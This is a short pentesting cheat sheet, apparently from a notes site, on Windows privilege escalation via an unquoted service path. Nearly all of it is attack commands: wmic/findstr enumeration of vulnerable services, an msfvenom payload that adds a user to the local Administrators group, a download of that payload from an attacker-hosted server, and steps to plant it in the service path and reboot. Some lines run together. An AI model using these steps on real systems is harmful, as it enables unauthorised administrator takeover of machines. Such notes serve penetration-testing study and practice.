Windows PrivEsc with Unquoted Service Path
Investigation
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v """ "sc qc "Development Service"Exploitation
1. Create a Payload
msfvenom -p windows/exec CMD='net localgroup Administrators victim-user /add' -f exe-service -o Devservice.exe2. Place a Payload to Target Path
Invoke-WebRequest -Uri http://<local-ip>:8000/Devservice.exe -OutFile .\Devservice.exemv .\Devservice.exe '\Program Files\Development Files\'3. Change Permission of the Payload
4. Restart Machine
Last updated